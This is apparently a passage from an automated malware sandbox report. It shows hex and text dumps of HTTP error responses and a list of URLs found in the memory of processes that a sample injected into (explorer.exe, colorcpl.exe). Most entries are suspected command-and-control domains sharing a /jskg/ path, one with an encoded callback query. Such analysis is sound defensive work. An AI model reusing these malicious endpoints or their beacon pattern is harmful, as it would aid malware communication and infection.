20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 
2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:32:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:33:02 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w0Q2pTZmb8uR3ituotWcihVxyPQrSYnZIY93E3ajzRG67Kyly0iJn1NeYllgOaoyveTmmmo6vEHy0saGUSqpvK3tGGiMXqOvgolY4gdNrN5eL75KIF7l9k0xJAxsZzo1R1lJ5twk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=10.999918Server: cloudflareCF-RAY: 82958633cd4657c4-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 
6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofol
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:33:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:33:34 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4DAWwtzAvJlPfepUXf0REHpRpg1KZxNlQmTEEg912%2B85hBib4Ig2ueyhZIBo3IBp0csP1An1oKj3iUwMIIIyL4ssmB931pkQ0tCLGYp4vFTBSg1TJIfhKEbnPR4ir3dLegP8gN3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=15.000105Server: cloudflareCF-RAY: 829586f64f218287-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 
65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nof
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1236date: Tue, 21 Nov 2023 02:33:29 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 
2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000000.2001871398.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4448974063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000002.4456836117.0000000011332000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4450315499.00000000054F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://lacroixundkress.de/jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000002.4453052192.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000002.4452618925.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4452142235.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2004670806.0000000008890000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bootyfashions.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bootyfashions.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bootyfashions.com/jskg/www.topazkibblez.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bootyfashions.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.coryfireshop.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.coryfireshop.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.coryfireshop.com/jskg/www.lacroixundkress.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.coryfireshop.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dog2meeting.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dog2meeting.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dog2meeting.com/jskg/www.erotictoybox.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dog2meeting.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.erotictoybox.com
Source: explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.erotictoybox.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.erotictoybox.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kvrkl.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kvrkl.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kvrkl.com/jskg/www.switchtoambitwithmirtha.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kvrkl.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lacroixundkress.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lacroixundkress.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lacroixundkress.com/jskg/www.saraadamchak.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lacroixundkress.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lactationdrink.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lactationdrink.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lactationdrink.com/jskg/www.wisdomtoothguru.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lactationdrink.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lbarco.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lbarco.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lbarco.com/jskg/www.bootyfashions.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lbarco.comReferer:
Source: explorer.exe, 00000003.00000002.4456836117.0000000011332000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4450315499.00000000054F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.pnorg.net
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.pnorg.net/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.pnorg.net/jskg/www.dog2meeting.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.pnorg.netReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ppc-listing.info
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ppc-listing.info/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ppc-listing.info/jskg/www.pnorg.net
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ppc-listing.infoReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.revistabrasileiramarketing.info
